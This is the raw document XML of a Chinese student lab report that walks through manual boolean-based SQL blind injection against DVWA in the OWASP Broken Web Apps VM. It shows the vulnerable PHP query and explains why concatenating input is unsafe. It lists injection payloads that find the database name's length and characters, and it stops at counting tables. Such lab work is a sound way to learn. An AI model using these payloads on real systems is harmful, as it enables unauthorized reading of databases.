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E809C7"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 w14:paraId="43D9787F">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN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 xml:space="preserve">： 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  <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>赵悦蛟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 xml:space="preserve"> 学号：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2313650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 xml:space="preserve">班级： </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1071</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4636F6D6"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 w14:paraId="7C09F6FF"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</w:p>
    <w:p w14:paraId="03116C83">
      <w:pPr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SQL盲注。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25552480"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 w14:paraId="5F546BD4">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>基于DVWA里的SQL盲注案例，实施手工盲注，参考课本，撰写实验报告。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4513F7FA"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 w14:paraId="09A2ED89">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="both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SQL盲注是不能通过直接显示的途径获取数据库数据的方法。在盲注中，攻击者根据其返回页面的不同来判断信息（可能是页面内容不同，也可能是响应时间不同）。一般情况下，盲注可分为3类：基于布尔的SQL盲注、基于时间的SQL盲注、基于报错的SQL盲注。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF4CB38"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配置虚拟机环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AF5C74">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="0"/>
        <w:jc w:val="both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下载OWASP并导入虚拟机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D4F439">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="20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56530" cy="3079115"/>
            <wp:effectExtent l="0" t="0" r="1270" b="6985"/>
            <wp:docPr id="9" name="图片 9" descr="局部截取_20250529_19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局部截取_20250529_1918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64A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="48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输入用户名root，</w:t>
      </w:r>
      <w:r>
        <w:t>密码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>owaspbwa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成功登陆到</w:t>
      </w:r>
      <w:r>
        <w:t>OWASP Broken Web Apps VM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可以得到虚拟机提供的URL。进入主机的浏览器，输入http://192.168.137.131/，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>在本机浏览器中访问 OWASP Web 界面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C59B19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="20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3124200"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="10" name="图片 10" descr="msedge.exe_20250529_19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sedge.exe_20250529_1940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3395">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:num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选择DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2171B4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9600" cy="600075"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="11" name="图片 11" descr="局部截取_20250529_19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局部截取_20250529_1940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BBE9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进入这个界面将DVWA Security设置为low，完成实验环境的准备工作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8EC84E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24200"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="13" name="图片 13" descr="msedge.exe_20250529_19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sedge.exe_20250529_1943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B313">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:ind w:leftChars="200"/>
        <w:jc w:val="both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二．基于布尔的SQL盲注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371B9589">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="both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判断是否存在注入，注入是字符型还是数字型？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B527E1A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CA0496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输入1，显示存在：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280B1C5F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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9865" cy="3124200"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="14" name="图片 14" descr="msedge.exe_20250529_19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sedge.exe_20250529_1949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9A3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输入1' and 1=1 #，单引号闭合了原来SQL语句中的第一个单引号，后面的#闭合了后面的单引号。点击submit提交显示存在：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5E16B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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7325" cy="1647825"/>
            <wp:effectExtent l="0" t="0" r="3175" b="3175"/>
            <wp:docPr id="15" name="图片 15" descr="局部截取_20250529_195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局部截取_20250529_1950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B480">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>输入1' and 1=2 #，点击submit提交后没有显示，不存在：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499633F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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70500" cy="2115185"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="16" name="图片 16" descr="局部截取_20250529_195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局部截取_20250529_1952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91B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:jc w:val="both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这说明了存在字符型的SQL盲注。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEEDDF3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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点击View source，查看源码：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF119B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val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default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="3027680"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="17" name="图片 17" descr="局部截取_20250529_19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局部截取_20250529_1953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6E3"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wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:caps w:val="0"/>
          <w:color w:val="A0A1A7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$id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$_GET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83A42"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>[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0A14F"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>'id'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83A42"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>];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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:caps w:val="0"/>
          <w:color w:val="A0A1A7"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>// 直接获取用户输入的 `id`，未做任何过滤或转义</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEDC285"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wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:caps w:val="0"/>
          <w:color w:val="A0A1A7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$getid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0A14F"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>'SELECT first_name, last_name FROM users WHERE user_id = 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$id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50A14F"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>''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83A42"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:caps w:val="0"/>
          <w:color w:val="A0A1A7"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>// 直接将 `$id` 拼接到 SQL 语句中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EF32B1">
      <w:pPr>
        <w:pStyle w:val="6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wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts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$result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mysql_query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83A42"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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078F2"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$getid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83A42"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18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494949"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:iCs/>
          <w:caps w:val="0"/>
          <w:color w:val="A0A1A7"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>// 执行 SQL 查询</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C2C38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spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ED381F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可以看到在安全级别为low的情况下，程序没有对id进行处理。</w:t>
      </w:r>
      <w:r>
        <w:t>直接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>将用户输入</w:t>
      </w:r>
      <w:r>
        <w:t>拼接到 SQL 语句中，攻击者可通过构造恶意输入篡改查询逻辑。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBB8143">
      <w:pPr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猜解数据库名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E03ADBE">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>想要猜解数据库名，首先要猜解数据库名的长度，然后挨个猜解字符。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E41CD6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t xml:space="preserve">输入 1' and length(database())=1 # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，显示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>不存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6624B8DB"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1718310"/>
            <wp:effectExtent l="0" t="0" r="1905" b="8890"/>
            <wp:docPr id="18" name="图片 18" descr="局部截取_20250529_20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局部截取_20250529_2002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06BE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default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">1' and length(database())=2 # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，显示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>不存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（提交之后输入框清空）：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4595495" cy="1925955"/>
            <wp:effectExtent l="0" t="0" r="1905" b="4445"/>
            <wp:docPr id="19" name="图片 19" descr="局部截取_20250529_2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局部截取_20250529_2003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54E3">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">输入 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">1' and length(database())=3 # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，显示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>不存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">， </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAF7B3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default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">1' and length(database())=4 # </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，显示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D57981"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1774190"/>
            <wp:effectExtent l="0" t="0" r="10160" b="3810"/>
            <wp:docPr id="20" name="图片 20" descr="局部截取_20250529_20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局部截取_20250529_2004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1C64">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>说明数据库名长度为 4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DDEE604">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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接下来获取数据库名字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CA4740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1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts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default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="9A6E3B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23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97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，显示存在，说明数 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704061A7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据库名的第一个字符的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ascii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值大于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97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（小写字母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ascii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值）； </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EABF8FA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2.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default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="9A6E3B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="2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122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，显示存在，说明数 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55674C22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据库名的第一个字符的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ascii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值小于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122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（小写字母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z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ascii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值）； </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E67ECA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3.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default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="9A6E3B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="2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109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，显示存在，说明数 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F026884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据库名的第一个字符的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ascii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值小于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109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（小写字母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m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ascii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值）； </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D0263D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4.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default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="9A6E3B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="2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103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，显示存在，说明数 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9C4B5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据库名的第一个字符的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ascii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值小于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103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（小写字母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g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ascii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值）； </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4C4B01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5.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default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="9A6E3B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="2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100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，显示不存在，说明 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBCD7D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数据库名的第一个字符的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ascii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值不小于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100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（小写字母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d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的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ascii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值）； </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3730DBBE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</w:pP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6. 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default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="9A6E3B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23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100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，显示不存在，说明 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C35985C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数据库名的第一个字符的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ascii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值不大于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100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（小写字母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的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ascii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值），所以数据库名的第一个字符的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ascii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值为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100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，即小写字母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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EE3C36"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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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……</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616DA189">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>按照这个过程不断尝试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>就可以猜解出完整的数据库名（dvwa</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>了。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588CEC4C">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default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部分过程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64505E73">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr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default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="9A6E3B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="2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103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，显示存在：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E340C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241550"/>
            <wp:effectExtent l="0" t="0" r="1905" b="6350"/>
            <wp:docPr id="21" name="图片 21" descr="局部截取_20250529_20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局部截取_20250529_2008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E826">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr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default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="9A6E3B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>&lt;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100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，显示不存在</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3B25C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2045335"/>
            <wp:effectExtent l="0" t="0" r="8890" b="12065"/>
            <wp:docPr id="22" name="图片 22" descr="局部截取_20250529_20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局部截取_20250529_2009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9F74">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pP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输入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1'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and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="DC4A68"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23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database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(),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))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="999999"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23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 xml:space="preserve">100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#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，显示不存在</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E141CB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2045335"/>
            <wp:effectExtent l="0" t="0" r="8890" b="12065"/>
            <wp:docPr id="23" name="图片 23" descr="局部截取_20250529_200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局部截取_20250529_2009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0A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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>所以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>数据库名的第一个字符的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ascii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值为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:color w:val="990055"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体" w:cs="新宋体"/>
          <w:color w:val="37352F"/>
          <w:kern w:val="0"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">，即小写字母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d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797027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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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猜第二个第三个第四个字符的部分过程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2F22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</w:pP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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5264150" cy="2127250"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="26" name="图片 26" descr="局部截取_20250529_20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局部截取_20250529_2017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4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</w:pP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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1840230"/>
            <wp:effectExtent l="0" t="0" r="10795" b="1270"/>
            <wp:docPr id="28" name="图片 28" descr="局部截取_20250529_20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局部截取_20250529_20190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6C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</w:pP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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="2240280"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="29" name="图片 29" descr="局部截取_20250529_20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局部截取_20250529_2019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2E4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得到第二个字符ascll码为118，对应小写字母v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AD9C88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051810"/>
            <wp:effectExtent l="0" t="0" r="635" b="8890"/>
            <wp:docPr id="30" name="图片 30" descr="局部截取_20250529_20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局部截取_20250529_2021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F451"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8650" cy="2607310"/>
            <wp:effectExtent l="0" t="0" r="6350" b="8890"/>
            <wp:docPr id="31" name="图片 31" descr="局部截取_20250529_20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局部截取_20250529_2023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F6F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443480"/>
            <wp:effectExtent l="0" t="0" r="8890" b="7620"/>
            <wp:docPr id="32" name="图片 32" descr="局部截取_20250529_202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局部截取_20250529_2025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97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275840"/>
            <wp:effectExtent l="0" t="0" r="1905" b="10160"/>
            <wp:docPr id="33" name="图片 33" descr="局部截取_20250529_20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局部截取_20250529_2025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827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最后得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>完整的数据库名dvwa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7345C945">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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猜解数据库表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609DB580">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>首先猜解数据库中表的数量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
